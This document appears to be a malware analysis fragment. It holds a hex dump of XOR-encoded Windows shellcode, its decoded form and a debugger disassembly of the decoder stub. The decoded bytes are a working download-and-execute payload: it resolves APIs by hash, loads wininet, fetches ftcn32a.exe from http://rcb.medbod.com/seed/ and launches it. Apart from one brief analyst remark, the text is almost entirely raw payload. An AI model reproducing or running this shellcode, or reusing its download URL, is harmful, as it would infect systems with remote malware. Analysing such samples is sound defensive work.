00000000 eb 10 5a 4a 31 c9 66 b9 c3 02 80 34 0a 21 e2 fa |ë.ZJ1Éf¹Ã..4.!âú|
00000010 eb 05 e8 eb ff ff ff 90 b1 b1 b1 b1 c9 a1 21 21 |ë.èëÿÿÿ.±±±±É¡!!|
00000020 21 21 20 23 22 25 24 27 26 29 28 2b 2a 2d 2c 2f |!! #"%$'&)(+*-,/|
00000030 2e 31 30 33 32 35 34 37 36 39 38 3b 3a 3d 3c 3f |.1032547698;:=<?|
00000040 3e 01 01 03 02 05 04 07 06 09 08 0b 0a 0d 0c 0f |>...............|
00000050 0e 11 10 13 12 15 14 17 16 19 18 1b 1a 1d 1c 1f |................|
00000060 1e 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 |.GGGGGGGGGGGGGGG|
00000070 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 |GGGGGGGGGGGGGGGG|
*
000000a0 47 7f c9 e3 20 21 21 a8 27 de 17 49 af 6f 2f cd |G.Éã !!š'Þ.I¯o/Í|
000000b0 c9 ec 20 21 21 a8 67 29 de 17 49 84 36 21 5d c9 |Éì !!šg)Þ.I.6!]É|
000000c0 9f 20 21 21 a8 67 2d de 17 49 3e 58 2b c9 c9 8e |. !!šg-Þ.I>X+ÉÉ.|
000000d0 20 21 21 a8 67 31 de 17 49 da b6 dc 2e c9 81 20 | !!šg1Þ.IÚ¶Ü.É. |
000000e0 21 21 a8 67 35 de 17 49 53 df 92 37 c9 b0 20 21 |!!šg5Þ.ISß.7É° !|
000000f0 21 a8 67 39 de 17 49 91 68 0c fa c9 a3 20 21 21 |!šg9Þ.I.h.úÉ£ !!|
00000100 a8 67 3d 10 e1 71 91 a3 71 91 23 71 11 e1 71 71 |šg=.áq.£q.#q.áqq|
00000110 91 61 e0 c1 39 71 b1 b1 b1 c9 2d 21 21 21 47 55 |.aàÁ9q±±±É-!!!GU|
00000120 42 4f 12 13 40 0f 44 59 44 21 de 77 2d a8 67 0d |BO..@.DYD!Þw-šg.|
00000130 c9 29 21 21 21 56 48 4f 48 4f 44 55 21 de 77 29 |É)!!!VHOHODU!Þw)|
00000140 a8 67 25 de 57 25 49 08 65 c9 76 c9 13 20 21 21 |šg%ÞW%I.eÉvÉ. !!|
00000150 a8 67 01 de 57 25 49 68 cc 2e 5f c9 03 20 21 21 |šg.ÞW%IhÌ._É. !!|
00000160 a8 67 05 de 57 25 49 aa 6a c2 7e c9 33 20 21 21 |šg.ÞW%IªjÂ~É3 !!|
00000170 a8 67 09 10 e1 71 71 71 71 71 de 77 01 a8 67 11 |šg..áqqqqqÞw.šg.|
00000180 10 e1 71 71 71 71 c9 61 21 21 21 49 55 55 51 1b |.áqqqqÉa!!!IUUQ.|
00000190 0e 0e 53 42 43 0f 4c 44 45 43 4e 45 0f 42 4e 4c |..SBC.LDECNE.BNL|
000001a0 0e 52 44 44 45 0e 47 55 42 4f 12 13 40 0f 44 59 |.RDDE.GUBO..@.DY|
000001b0 44 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 |D!!!!!!!!!!!!!!!|
000001c0 21 21 21 21 21 21 21 21 21 21 21 de 57 11 de 77 |!!!!!!!!!!!ÞW.Þw|
000001d0 05 a8 67 15 10 e8 47 98 21 31 a8 d1 24 19 21 21 |.šg..èG.!1šÑ$.!!|
000001e0 21 71 49 61 21 21 21 a8 d1 24 61 21 21 21 71 de |!qIa!!!šÑ$a!!!qÞ|
000001f0 57 15 de 77 09 aa 67 19 a4 e1 2e a5 3f 21 21 21 |W.Þw.ªg.€á.¥?!!!|
00000200 10 e1 71 a8 d1 24 1d 21 21 21 71 de 57 19 a8 d1 |.áqšÑ$.!!!qÞW.šÑ|
00000210 24 61 21 21 21 71 de 57 0d de 77 31 c3 9d de 57 |$a!!!qÞW.Þw1Ã.ÞW|
00000220 0d de 77 35 a0 cd 75 21 21 21 ac 1d 05 10 e1 10 |.Þw5 Íu!!!¬...á.|
00000230 e8 a0 e0 34 21 21 21 8a c3 dc e7 65 05 31 65 ac |è à4!!!.ÃÜçe.1e¬|
00000240 65 05 31 75 71 70 70 70 70 70 70 c9 2c 21 21 21 |e.1uqppppppÉ,!!!|
00000250 47 55 42 4f 12 13 40 0f 44 59 44 21 21 70 de 77 |GUBO..@.DYD!!pÞw|
00000260 39 49 de de de de de 77 3d 74 77 45 80 11 21 21 |9IÞÞÞÞÞw=twE..!!|
00000270 21 aa 61 2d aa 51 3d 8c aa 49 29 a8 c9 7f 7c e3 |!ªa-ªQ=.ªI)šÉ.|ã|
00000280 25 21 72 74 77 76 aa 4d 05 39 aa 64 1d aa 75 24 |%!rtwvªM.9ªd.ªu$|
00000290 59 20 cb aa 6b 39 aa 7b 01 20 ca c2 13 68 aa 15 |Y ˪k9ª{. ÊÂ.hª.|
000002a0 aa 20 cf 10 de dd 10 e1 8d 19 c1 55 26 e0 ee 2c |ª Ï.ÞÝ.á..ÁU&àî,|
000002b0 20 e6 ca d3 1a 5d 05 35 54 c0 aa 7b 05 20 ca 47 | æÊÓ.].5TÀª{. ÊG|
000002c0 aa 2d 6a aa 7b 3d 20 ca aa 25 aa 20 c9 ca 23 10 |ª-jª{= ʪ%ª ÉÊ#.|
000002d0 e1 a8 cb 7e 7f 7c 7a e3 25 21 90 90 90 90 90 90 |ášË~.|zã%!......|
000002e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000006a0
| 00000060 3f 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 |?fffffffffffffff| 00000070 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 |ffffffffffffffff| * 000000a0 66 5e e8 c2 01 00 00 89 06 ff 36 68 8e 4e 0e ec |f^èÂ.....ÿ6h.N.ì| 000000b0 e8 cd 01 00 00 89 46 08 ff 36 68 a5 17 00 7c e8 |èÍ....F.ÿ6h¥..|è| 000000c0 be 01 00 00 89 46 0c ff 36 68 1f 79 0a e8 e8 af |Ÿ....F.ÿ6h.y.èè¯| 000000d0 01 00 00 89 46 10 ff 36 68 fb 97 fd 0f e8 a0 01 |....F.ÿ6hû.ý.è .| 000000e0 00 00 89 46 14 ff 36 68 72 fe b3 16 e8 91 01 00 |...F.ÿ6hrþ³.è...| 000000f0 00 89 46 18 ff 36 68 b0 49 2d db e8 82 01 00 00 |..F.ÿ6h°I-Ûè....| 00000100 89 46 1c 31 c0 50 b0 82 50 b0 02 50 30 c0 50 50 |.F.1ÀP°.P°.P0ÀPP| 00000110 b0 40 c1 e0 18 50 90 90 90 e8 0c 00 00 00 66 74 |°@Áà.P...è....ft| 00000120 63 6e 33 32 61 2e 65 78 65 00 ff 56 0c 89 46 2c |cn32a.exe.ÿV..F,| 00000130 e8 08 00 00 00 77 69 6e 69 6e 65 74 00 ff 56 08 |è....wininet.ÿV.| 00000140 89 46 04 ff 76 04 68 29 44 e8 57 e8 32 01 00 00 |.F.ÿv.h)DèWè2...| 00000150 89 46 20 ff 76 04 68 49 ed 0f 7e e8 22 01 00 00 |.F ÿv.hIí.~è"...| 00000160 89 46 24 ff 76 04 68 8b 4b e3 5f e8 12 01 00 00 |.F$ÿv.h.Kã_è....| 00000170 89 46 28 31 c0 50 50 50 50 50 ff 56 20 89 46 30 |.F(1ÀPPPPPÿV .F0| 00000180 31 c0 50 50 50 50 e8 40 00 00 00 68 74 74 70 3a |1ÀPPPPè@...http:| 00000190 2f 2f 72 63 62 2e 6d 65 64 62 6f 64 2e 63 6f 6d |//rcb.medbod.com| 000001a0 2f 73 65 65 64 2f 66 74 63 6e 33 32 61 2e 65 78 |/seed/ftcn32a.ex| 000001b0 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |e...............| 000001c0 00 00 00 00 00 00 00 00 00 00 00 ff 76 30 ff 56 |...........ÿv0ÿV| 000001d0 24 89 46 34 31 c9 66 b9 00 10 89 f0 05 38 00 00 |$.F41Éf¹...ð.8..| 000001e0 00 50 68 40 00 00 00 89 f0 05 40 00 00 00 50 ff |.Ph@....ð.@...Pÿ| 000001f0 76 34 ff 56 28 8b 46 38 85 c0 0f 84 1e 00 00 00 |v4ÿV(.F8.À......| 00000200 31 c0 50 89 f0 05 3c 00 00 00 50 ff 76 38 89 f0 |1ÀP.ð.<...Pÿv8.ð| 00000210 05 40 00 00 00 50 ff 76 2c ff 56 10 e2 bc ff 76 |.@...Pÿv,ÿV.âŒÿv| 00000220 2c ff 56 14 81 ec 54 00 00 00 8d 3c 24 31 c0 31 |,ÿV..ìT....<$1À1| 00000230 c9 81 c1 15 00 00 00 ab e2 fd c6 44 24 10 44 8d |É.Á....«âýÆD$.D.| 00000240 44 24 10 54 50 51 51 51 51 51 51 e8 0d 00 00 00 |D$.TPQQQQQQè....| 00000250 66 74 63 6e 33 32 61 2e 65 78 65 00 00 51 ff 56 |ftcn32a.exe..QÿV| 00000260 18 68 ff ff ff ff ff 56 1c 55 56 64 a1 30 00 00 |.hÿÿÿÿÿV.UVd¡0..| 00000270 00 8b 40 0c 8b 70 1c ad 8b 68 08 89 e8 5e 5d c2 |..@..p..h..è^]Â| 00000280 04 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 |..SUVW.l$..E<.T.| 00000290 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 |x.ê.J..Z .ëã2I.4| 000002a0 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d |..î1ÿü1À¬8àt.ÁÏ.| 000002b0 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 |.Çëò;|$.uá.Z$.ëf| 000002c0 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 |..K.Z..ë....èë.1| 000002d0 c0 89 ea 5f 5e 5d 5b c2 04 00 90 90 90 90 90 90 |À.ê_^][Â........| 000002e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 000006a0
00424A31 EB 10 JMP SHORT 1980_byt.00424A43 00424A33 5A POP EDX 00424A34 4A DEC EDX 00424A35 31C9 XOR ECX,ECX 00424A37 66:B9 C302 MOV CX,2C3 ; 2byte xor len 00424A3B 80340A 21 XOR BYTE PTR DS:[EDX+ECX],21 ; 1byte xor key 00424A3F ^E2 FA LOOPD SHORT 1980_byt.00424A3B 00424A41 EB 05 JMP SHORT 1980_byt.00424A48 00424A43 E8 EBFFFFFF CALL 1980_byt.00424A33
as it was recognized by the url, i saved my time here
00424A48 90 NOP 00424A49 B1 B1 MOV CL,0B1 00424A4B B1 B1 MOV CL,0B1 00424A4D C9 LEAVE 00424A4E A1 21212121 MOV EAX,DWORD PTR DS:[21212121] 00424A53 2023 AND BYTE PTR DS:[EBX],AH 00424A55 2225 24272629 AND AH,BYTE PTR DS:[29262724] 00424A5B 282B SUB BYTE PTR DS:[EBX],CH 00424A5D 2A2D 2C2F2E31 SUB CH,BYTE PTR DS:[312E2F2C] 00424A63 3033 XOR BYTE PTR DS:[EBX],DH 00424A65 3235 34373639 XOR DH,BYTE PTR DS:[39363734] 00424A6B 383B CMP BYTE PTR DS:[EBX],BH 00424A6D 3A3D 3C3F3E01 CMP BH,BYTE PTR DS:[13E3F3C] 00424A73 0103 ADD DWORD PTR DS:[EBX],EAX 00424A75 0205 04070609 ADD AL,BYTE PTR DS:[9060704] 00424A7B 080B OR BYTE PTR DS:[EBX],CL 00424A7D 0A0D 0C0F0E11 OR CL,BYTE PTR DS:[110E0F0C] 00424A83 1013 ADC BYTE PTR DS:[EBX],DL 00424A85 1215 14171619 ADC DL,BYTE PTR DS:[19161714] 00424A8B 181B SBB BYTE PTR DS:[EBX],BL 00424A8D 1A1D 1C1F1E47 SBB BL,BYTE PTR DS:[471E1F1C] 00424A93 47 INC EDI 00424A94 47 INC EDI 00424A95 47 INC EDI 00424A96 47 INC EDI 00424A97 47 INC EDI 00424A98 47 INC EDI 00424A99 47 INC EDI 00424A9A 47 INC EDI 00424A9B 47 INC EDI 00424A9C 47 INC EDI 00424A9D 47 INC EDI 00424A9E 47 INC EDI 00424A9F 47 INC EDI 00424AA0 47 INC EDI 00424AA1 47 INC EDI 00424AA2 47 INC EDI 00424AA3 47 INC EDI 00424AA4 47 INC EDI 00424AA5 47 INC EDI 00424AA6 47 INC EDI 00424AA7 47 INC EDI 00424AA8 47 INC EDI 00424AA9 47 INC EDI 00424AAA 47 INC EDI 00424AAB 47 INC EDI 00424AAC 47 INC EDI 00424AAD 47 INC EDI 00424AAE 47 INC EDI 00424AAF 47 INC EDI 00424AB0 47 INC EDI 00424AB1 47 INC EDI 00424AB2 47 INC EDI 00424AB3 47 INC EDI 00424AB4 47 INC EDI 00424AB5 47 INC EDI 00424AB6 47 INC EDI 00424AB7 47 INC EDI 00424AB8 47 INC EDI 00424AB9 47 INC EDI 00424ABA 47 INC EDI 00424ABB 47 INC EDI 00424ABC 47 INC EDI 00424ABD 47 INC EDI 00424ABE 47 INC EDI 00424ABF 47 INC EDI 00424AC0 47 INC EDI 00424AC1 47 INC EDI 00424AC2 47 INC EDI 00424AC3 47 INC EDI 00424AC4 47 INC EDI 00424AC5 47 INC EDI 00424AC6 47 INC EDI 00424AC7 47 INC EDI 00424AC8 47 INC EDI 00424AC9 47 INC EDI 00424ACA 47 INC EDI 00424ACB 47 INC EDI 00424ACC 47 INC EDI 00424ACD 47 INC EDI 00424ACE 47 INC EDI 00424ACF 47 INC EDI 00424AD0 47 INC EDI 00424AD1 47 INC EDI 00424AD2 ^7F C9 JG SHORT 1980_byt.00424A9D 00424AD4 E3 20 JECXZ SHORT 1980_byt.00424AF6 00424AD6 2121 AND DWORD PTR DS:[ECX],ESP 00424AD8 A8 27 TEST AL,27 00424ADA DE17 FICOM WORD PTR DS:[EDI] 00424ADC 49 DEC ECX 00424ADD AF SCAS DWORD PTR ES:[EDI] 00424ADE 6F OUTS DX,DWORD PTR ES:[EDI] ; I/O command 00424ADF 2F DAS 00424AE0 CD C9 INT 0C9 00424AE2 EC IN AL,DX ; I/O command 00424AE3 2021 AND BYTE PTR DS:[ECX],AH 00424AE5 21A8 6729DE17 AND DWORD PTR DS:[EAX+17DE2967],EBP 00424AEB 49 DEC ECX 00424AEC 8436 TEST BYTE PTR DS:[ESI],DH 00424AEE 215D C9 AND DWORD PTR SS:[EBP-37],EBX 00424AF1 9F LAHF 00424AF2 2021 AND BYTE PTR DS:[ECX],AH 00424AF4 21A8 672DDE17 AND DWORD PTR DS:[EAX+17DE2D67],EBP 00424AFA 49 DEC ECX 00424AFB 3E:58 POP EAX ; Superfluous prefix 00424AFD 2BC9 SUB ECX,ECX 00424AFF C9 LEAVE 00424B00 8E20 MOV FS,WORD PTR DS:[EAX] ; Modification of segment register 00424B02 2121 AND DWORD PTR DS:[ECX],ESP 00424B04 A8 67 TEST AL,67 00424B06 31DE XOR ESI,EBX 00424B08 17 POP SS ; Modification of segment register 00424B09 49 DEC ECX 00424B0A DAB6 DC2EC981 FIDIV DWORD PTR DS:[ESI+81C92EDC] 00424B10 2021 AND BYTE PTR DS:[ECX],AH 00424B12 21A8 6735DE17 AND DWORD PTR DS:[EAX+17DE3567],EBP 00424B18 49 DEC ECX 00424B19 53 PUSH EBX 00424B1A DF92 37C9B020 FIST WORD PTR DS:[EDX+20B0C937] 00424B20 2121 AND DWORD PTR DS:[ECX],ESP 00424B22 A8 67 TEST AL,67 00424B24 39DE CMP ESI,EBX 00424B26 17 POP SS ; Modification of segment register 00424B27 49 DEC ECX 00424B28 91 XCHG EAX,ECX 00424B29 68 0CFAC9A3 PUSH A3C9FA0C 00424B2E 2021 AND BYTE PTR DS:[ECX],AH 00424B30 21A8 673D10E1 AND DWORD PTR DS:[EAX+E1103D67],EBP 00424B36 ^71 91 JNO SHORT 1980_byt.00424AC9 00424B38 A3 71912371 MOV DWORD PTR DS:[71239171],EAX 00424B3D 11E1 ADC ECX,ESP 00424B3F 71 71 JNO SHORT 1980_byt.00424BB2 00424B41 91 XCHG EAX,ECX 00424B42 61 POPAD 00424B43 ^E0 C1 LOOPDNE SHORT 1980_byt.00424B06 00424B45 3971 B1 CMP DWORD PTR DS:[ECX-4F],ESI 00424B48 B1 B1 MOV CL,0B1 00424B4A C9 LEAVE 00424B4B 2D 21212147 SUB EAX,47212121 00424B50 55 PUSH EBP 00424B51 42 INC EDX 00424B52 4F DEC EDI 00424B53 1213 ADC DL,BYTE PTR DS:[EBX] 00424B55 40 INC EAX 00424B56 0F4459 44 CMOVE EBX,DWORD PTR DS:[ECX+44] 00424B5A 21DE AND ESI,EBX 00424B5C 77 2D JA SHORT 1980_byt.00424B8B 00424B5E A8 67 TEST AL,67 00424B60 0D C9292121 OR EAX,212129C9 00424B65 2156 48 AND DWORD PTR DS:[ESI+48],EDX 00424B68 4F DEC EDI 00424B69 48 DEC EAX 00424B6A 4F DEC EDI 00424B6B 44 INC ESP 00424B6C 55 PUSH EBP 00424B6D 21DE AND ESI,EBX 00424B6F 77 29 JA SHORT 1980_byt.00424B9A 00424B71 A8 67 TEST AL,67 00424B73 25 DE572549 AND EAX,492557DE 00424B78 0865 C9 OR BYTE PTR SS:[EBP-37],AH 00424B7B ^76 C9 JBE SHORT 1980_byt.00424B46 00424B7D 1320 ADC ESP,DWORD PTR DS:[EAX] 00424B7F 2121 AND DWORD PTR DS:[ECX],ESP 00424B81 A8 67 TEST AL,67 00424B83 01DE ADD ESI,EBX 00424B85 57 PUSH EDI 00424B86 25 4968CC2E AND EAX,2ECC6849 00424B8B 5F POP EDI 00424B8C C9 LEAVE 00424B8D 0320 ADD ESP,DWORD PTR DS:[EAX] 00424B8F 2121 AND DWORD PTR DS:[ECX],ESP 00424B91 A8 67 TEST AL,67 00424B93 05 DE572549 ADD EAX,492557DE 00424B98 AA STOS BYTE PTR ES:[EDI] 00424B99 6A C2 PUSH -3E 00424B9B ^7E C9 JLE SHORT 1980_byt.00424B66 00424B9D 3320 XOR ESP,DWORD PTR DS:[EAX] 00424B9F 2121 AND DWORD PTR DS:[ECX],ESP 00424BA1 A8 67 TEST AL,67 00424BA3 0910 OR DWORD PTR DS:[EAX],EDX 00424BA5 E1 71 LOOPDE SHORT 1980_byt.00424C18 00424BA7 71 71 JNO SHORT 1980_byt.00424C1A 00424BA9 71 71 JNO SHORT 1980_byt.00424C1C 00424BAB DE77 01 FIDIV WORD PTR DS:[EDI+1] 00424BAE A8 67 TEST AL,67 00424BB0 1110 ADC DWORD PTR DS:[EAX],EDX 00424BB2 E1 71 LOOPDE SHORT 1980_byt.00424C25 00424BB4 71 71 JNO SHORT 1980_byt.00424C27 00424BB6 ^71 C9 JNO SHORT 1980_byt.00424B81 00424BB8 61 POPAD 00424BB9 2121 AND DWORD PTR DS:[ECX],ESP 00424BBB 2149 55 AND DWORD PTR DS:[ECX+55],ECX 00424BBE 55 PUSH EBP 00424BBF 51 PUSH ECX 00424BC0 1B0E SBB ECX,DWORD PTR DS:[ESI] 00424BC2 0E PUSH CS 00424BC3 53 PUSH EBX 00424BC4 42 INC EDX 00424BC5 43 INC EBX 00424BC6 0F4C4445 43 CMOVL EAX,DWORD PTR SS:[EBP+EAX*2+43] 00424BCB 4E DEC ESI 00424BCC 45 INC EBP 00424BCD 0F424E 4C CMOVB ECX,DWORD PTR DS:[ESI+4C] 00424BD1 0E PUSH CS 00424BD2 52 PUSH EDX 00424BD3 44 INC ESP 00424BD4 44 INC ESP 00424BD5 45 INC EBP 00424BD6 0E PUSH CS 00424BD7 47 INC EDI 00424BD8 55 PUSH EBP 00424BD9 42 INC EDX 00424BDA 4F DEC EDI 00424BDB 1213 ADC DL,BYTE PTR DS:[EBX] 00424BDD 40 INC EAX 00424BDE 0F4459 44 CMOVE EBX,DWORD PTR DS:[ECX+44] 00424BE2 2121 AND DWORD PTR DS:[ECX],ESP 00424BE4 2121 AND DWORD PTR DS:[ECX],ESP 00424BE6 2121 AND DWORD PTR DS:[ECX],ESP 00424BE8 2121 AND DWORD PTR DS:[ECX],ESP 00424BEA 2121 AND DWORD PTR DS:[ECX],ESP 00424BEC 2121 AND DWORD PTR DS:[ECX],ESP 00424BEE 2121 AND DWORD PTR DS:[ECX],ESP 00424BF0 2121 AND DWORD PTR DS:[ECX],ESP 00424BF2 2121 AND DWORD PTR DS:[ECX],ESP 00424BF4 2121 AND DWORD PTR DS:[ECX],ESP 00424BF6 2121 AND DWORD PTR DS:[ECX],ESP 00424BF8 2121 AND DWORD PTR DS:[ECX],ESP 00424BFA 2121 AND DWORD PTR DS:[ECX],ESP 00424BFC DE57 11 FICOM WORD PTR DS:[EDI+11] 00424BFF DE77 05 FIDIV WORD PTR DS:[EDI+5] 00424C02 A8 67 TEST AL,67 00424C04 15 10E84798 ADC EAX,9847E810 00424C09 2131 AND DWORD PTR DS:[ECX],ESI 00424C0B A8 D1 TEST AL,0D1 00424C0D 24 19 AND AL,19 00424C0F 2121 AND DWORD PTR DS:[ECX],ESP 00424C11 2171 49 AND DWORD PTR DS:[ECX+49],ESI 00424C14 61 POPAD 00424C15 2121 AND DWORD PTR DS:[ECX],ESP 00424C17 21A8 D1246121 AND DWORD PTR DS:[EAX+216124D1],EBP 00424C1D 2121 AND DWORD PTR DS:[ECX],ESP 00424C1F ^71 DE JNO SHORT 1980_byt.00424BFF 00424C21 57 PUSH EDI 00424C22 15 DE7709AA ADC EAX,AA0977DE 00424C27 67:19A4 E12E SBB DWORD PTR DS:[SI+2EE1],ESP 00424C2C A5 MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES> 00424C2D 3F AAS 00424C2E 2121 AND DWORD PTR DS:[ECX],ESP 00424C30 2110 AND DWORD PTR DS:[EAX],EDX 00424C32 E1 71 LOOPDE SHORT 1980_byt.00424CA5 00424C34 A8 D1 TEST AL,0D1 00424C36 24 1D AND AL,1D 00424C38 2121 AND DWORD PTR DS:[ECX],ESP 00424C3A 2171 DE AND DWORD PTR DS:[ECX-22],ESI 00424C3D 57 PUSH EDI 00424C3E 19A8 D1246121 SBB DWORD PTR DS:[EAX+216124D1],EBP 00424C44 2121 AND DWORD PTR DS:[ECX],ESP 00424C46 ^71 DE JNO SHORT 1980_byt.00424C26 00424C48 57 PUSH EDI 00424C49 0D DE7731C3 OR EAX,C33177DE 00424C4E 9D POPFD 00424C4F DE57 0D FICOM WORD PTR DS:[EDI+D] 00424C52 DE77 35 FIDIV WORD PTR DS:[EDI+35] 00424C55 A0 CD752121 MOV AL,BYTE PTR DS:[212175CD] 00424C5A 21AC1D 0510E110 AND DWORD PTR SS:[EBP+EBX+10E11005],EBP 00424C61 E8 A0E03421 CALL 21772D06 00424C66 2121 AND DWORD PTR DS:[ECX],ESP 00424C68 8AC3 MOV AL,BL 00424C6A DCE7 FSUBR ST(7),ST 00424C6C 65:05 3165AC65 ADD EAX,65AC6531 ; Superfluous prefix 00424C72 05 31757170 ADD EAX,70717531 00424C77 70 70 JO SHORT 1980_byt.00424CE9 00424C79 70 70 JO SHORT 1980_byt.00424CEB 00424C7B ^70 C9 JO SHORT 1980_byt.00424C46 00424C7D 2C 21 SUB AL,21 00424C7F 2121 AND DWORD PTR DS:[ECX],ESP 00424C81 47 INC EDI 00424C82 55 PUSH EBP 00424C83 42 INC EDX 00424C84 4F DEC EDI 00424C85 1213 ADC DL,BYTE PTR DS:[EBX] 00424C87 40 INC EAX 00424C88 0F4459 44 CMOVE EBX,DWORD PTR DS:[ECX+44] 00424C8C 2121 AND DWORD PTR DS:[ECX],ESP 00424C8E ^70 DE JO SHORT 1980_byt.00424C6E 00424C90 77 39 JA SHORT 1980_byt.00424CCB 00424C92 49 DEC ECX 00424C93 DEDE FICOMP ESI ; Illegal use of register 00424C95 DEDE FICOMP ESI ; Illegal use of register 00424C97 DE77 3D FIDIV WORD PTR DS:[EDI+3D] 00424C9A 74 77 JE SHORT 1980_byt.00424D13 00424C9C 45 INC EBP 00424C9D 8011 21 ADC BYTE PTR DS:[ECX],21 00424CA0 2121 AND DWORD PTR DS:[ECX],ESP 00424CA2 AA STOS BYTE PTR ES:[EDI] 00424CA3 61 POPAD 00424CA4 2D AA513D8C SUB EAX,8C3D51AA 00424CA9 AA STOS BYTE PTR ES:[EDI] 00424CAA 49 DEC ECX 00424CAB 29A8 C97F7CE3 SUB DWORD PTR DS:[EAX+E37C7FC9],EBP 00424CB1 25 21727477 AND EAX,77747221 00424CB6 ^76 AA JBE SHORT 1980_byt.00424C62 00424CB8 4D DEC EBP 00424CB9 05 39AA641D ADD EAX,1D64AA39 00424CBE AA STOS BYTE PTR ES:[EDI] 00424CBF 75 24 JNZ SHORT 1980_byt.00424CE5 00424CC1 59 POP ECX 00424CC2 20CB AND BL,CL 00424CC4 AA STOS BYTE PTR ES:[EDI] 00424CC5 6B39 AA IMUL EDI,DWORD PTR DS:[ECX],-56 00424CC8 7B 01 JPO SHORT 1980_byt.00424CCB 00424CCA 20CA AND DL,CL 00424CCC C2 1368 RETN 6813 00424CCF AA STOS BYTE PTR ES:[EDI] 00424CD0 15 AA20CF10 ADC EAX,10CF20AA 00424CD5 DEDD FICOMP EBP ; Illegal use of register 00424CD7 10E1 ADC CL,AH 00424CD9 8D19 LEA EBX,DWORD PTR DS:[ECX] 00424CDB C155 26 E0 RCL DWORD PTR SS:[EBP+26],0E0 ; Shift constant out of range 1..31 00424CDF EE OUT DX,AL ; I/O command 00424CE0 2C 20 SUB AL,20 00424CE2 E6 CA OUT 0CA,AL ; I/O command 00424CE4 D31A RCR DWORD PTR DS:[EDX],CL 00424CE6 5D POP EBP 00424CE7 05 3554C0AA ADD EAX,AAC05435 00424CEC 7B 05 JPO SHORT 1980_byt.00424CF3 00424CEE 20CA AND DL,CL 00424CF0 47 INC EDI 00424CF1 AA STOS BYTE PTR ES:[EDI] 00424CF2 2D 6AAA7B3D SUB EAX,3D7BAA6A 00424CF7 20CA AND DL,CL 00424CF9 AA STOS BYTE PTR ES:[EDI] 00424CFA 25 AA20C9CA AND EAX,CAC920AA 00424CFF 2310 AND EDX,DWORD PTR DS:[EAX] 00424D01 ^E1 A8 LOOPDE SHORT 1980_byt.00424CAB 00424D03 CB RETF ; Far return 00424D04 7E 7F JLE SHORT 1980_byt.00424D85 00424D06 7C 7A JL SHORT 1980_byt.00424D82 00424D08 E3 25 JECXZ SHORT 1980_byt.00424D2F 00424D0A 0090 90909090 ADD BYTE PTR DS:[EAX+90909090],DL
